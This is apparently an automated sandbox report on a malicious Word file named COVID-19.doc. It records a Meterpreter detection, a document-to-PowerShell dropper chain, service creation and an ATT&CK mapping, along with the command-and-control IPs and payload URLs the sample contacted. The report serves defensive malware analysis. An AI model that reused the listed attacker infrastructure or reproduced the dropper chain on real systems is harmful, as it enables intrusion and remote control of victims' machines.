Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C20E8 GetVolumeInformationA,lstrlenA,wsprintfA,GetUserNameA,GetComputerNameA,17_2_004C20E8
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Remote Access Functionality:

barindex
Yara detected MeterpreterShow sources
Source: Yara matchFile source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting53Windows Service1Windows Service1Scripting53OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection111Obfuscated Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsService Execution1Network Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion4Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 341993 Sample: COVID-19.doc Startdate: 20/01/2021 Architecture: WINDOWS Score: 100 67 Yara detected Meterpreter 2->67 69 Suspicious powershell command line found 2->69 71 May check the online IP address of the machine 2->71 73 8 other signatures 2->73 10 WINWORD.EXE 172 42 2->10         started        14 cmd.exe 2->14         started        16 svchost.exe 1 1 2->16         started        process3 dnsIp4 57 C:\Users\user\Desktop\COVID-19.tmp, ASCII 10->57 dropped 89 Document exploit detected (process start blacklist hit) 10->89 91 Suspicious javascript / visual basic script found (invalid extension) 10->91 19 wscript.exe 15 10->19         started        24 cmd.exe 1 14->24         started        59 127.0.0.1 unknown unknown 16->59 file5 signatures6 process7 dnsIp8 61 78.141.194.181, 49715, 49723, 80 AS-CHOOPAUS France 19->61 55 C:\Users\user\Desktop\COVID-19.ps1, Little-endian 19->55 dropped 75 System process connects to network (likely due to code injection or exploit) 19->75 26 powershell.exe 13 19->26         started        77 Wscript starts Powershell (via cmd or directly) 24->77 29 powershell.exe 58 24->29         started        31 conhost.exe 24->31         started        file9 signatures10 process11 signatures12 85 Suspicious powershell command line found 26->85 33 powershell.exe 23 26->33         started        35 conhost.exe 26->35         started        87 Found suspicious powershell code related to unpacking or dynamic code loading 29->87 37 svchost.exe 29->37         started        process13 dnsIp14 41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        45 cmd.exe 1 33->45         started        47 conhost.exe 33->47         started        63 45.67.229.125, 49724, 80 ALEXHOSTMD Moldova Republic of 37->63 65 ifconfig.me 216.239.32.21, 49725, 80 GOOGLEUS United States 37->65 79 System process connects to network (likely due to code injection or exploit) 37->79 81 Found evasive API chain (may stop execution after checking mutex) 37->81 83 Contains functionality to change the desktop window for a process (likely to hide graphical interactions) 37->83 signatures15 process16 process17 49 sc.exe 1 41->49         started        51 sc.exe 1 43->51         started        53 sc.exe 1 45->53         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
COVID-19.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
17.2.svchost.exe.4c0000.0.unpack100%AviraHEUR/AGEN.1112533Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://78.141.194.181/0%Avira URL Cloudsafe
http://78.141.194.181/s34987435987.txt0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://45.67.229.125/c7mnnlrmfut6g1erfewlxlxniyo.php0%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt0%Avira URL Cloudsafe
http://78.141.194.181:80/s34987435987.txt0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
http://78.141.194.181/s34987435987.txt757AE1B0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://78.141.194.181/s34987435987.txtx0%Avira URL Cloudsafe
http://78.141.194.181/d56987230%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt$$0%Avira URL Cloudsafe
http://78.141.194.181/s34987435987.txt7C:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ifconfig.me
216.239.32.21
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://78.141.194.181/s34987435987.txttrue
    • Avira URL Cloud: safe
    unknown
    http://45.67.229.125/c7mnnlrmfut6g1erfewlxlxniyo.phptrue
    • Avira URL Cloud: safe
    unknown
    http://78.141.194.181/d569872345345.txttrue
    • Avira URL Cloud: safe
    unknown
    http://ifconfig.me//false
      high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://78.141.194.181/svchost.exe, 00000006.00000002.929375850.000001832207E000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
        high
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000006.00000002.929781703.0000018322330000.00000002.00000001.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
            high
            http://78.141.194.181:80/s34987435987.txtsvchost.exe, 00000006.00000002.929327170.0000018322066000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://78.141.194.181/s34987435987.txt757AE1Bsvchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://78.141.194.181/s34987435987.txtxpowershell.exe, 00000004.00000002.794647491.0000000004979000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/d5698723COVID-19.docfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/d569872345345.txt$$COVID-19.docfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/s34987435987.txt7C:edb.log.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.705342342.0000000004ED1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793030596.0000000004651000.00000004.00000001.sdmpfalse
                high
                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  78.141.194.181
                  unknownFrance
                  20473AS-CHOOPAUStrue
                  45.67.229.125
                  unknownMoldova Republic of
                  200019ALEXHOSTMDtrue
                  216.239.32.21
                  unknownUnited States
                  15169GOOGLEUSfalse

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:341993
                  Start date:20.01.2021
                  Start time:10:29:56
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:COVID-19.doc
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@30/27@1/4
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 94.4% (good quality ratio 87.3%)
                  • Quality average: 81.3%
                  • Quality standard deviation: 29.2%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 66
                  • Number of non-executed functions: 17
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 104.43.139.144
                  • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5108 because it is empty
                  • Execution Graph export aborted for target wscript.exe, PID 4248 because there are no executed function
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  10:31:05API Interceptor86x Sleep call for process: powershell.exe modified
                  10:31:42API Interceptor2x Sleep call for process: svchost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  78.141.194.181COVID-19.docGet hashmaliciousBrowse
                  • 78.141.194.181/d569872345345.txt
                  216.239.32.21SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                  • www.newbharatbakery.com/isub/?E6A=o8h88w7XVdxJ1uTDCp2NNRsrvJTuuHH9IllpA/1CkKx1rkqoN6C5GfVTprRt41jTNm/GQOr9jg==&oPqLWR=dVbHu890-L10
                  SpreadSheets.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  PO2364#FD21200.exeGet hashmaliciousBrowse
                  • www.skaizenpharma.com/p95n/?OVolpd=5FRBa94U2t0LNNIxEBtFHFm4QSzJU+Ps4gWlya5iW8k+rx7igyabcstI9kjJaJ0do6bGo58SHg==&lhv0-=H0DTRrWxUjUx2Z
                  1gEpBw4A95.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  SecuriteInfo.com.Trojan.Packed.140.27461.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  SecuriteInfo.com.BehavesLike.Win32.Trickbot.gm.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  vJHWQgfJ23.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  25.12.2020_Bel26.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  25.12.2020_Bel82.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  Bel_61.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  JP8MnQgsOD.exeGet hashmaliciousBrowse
                  • ipinfo.io/ip
                  30.11.2020_Pazartesi_51.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.25/country
                  30.11.2020_Pazartesi_51.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.25/country
                  EME_PO.39134.xlsxGet hashmaliciousBrowse
                  • www.fountaintriokc.com/mz59/?VrGd-0=QwUSBIuSE+Ofv6f/rqUdjwp6IkOfWoNuaQrUy5Rb/p4HOL6Y01yqVfQosEMy3LhwXy2Auw==&MDKtU=Jxotsl4pOvw
                  sP6iCH7OJG.exeGet hashmaliciousBrowse
                  • ipinfo.io/json
                  cQ8245rmPr.exeGet hashmaliciousBrowse
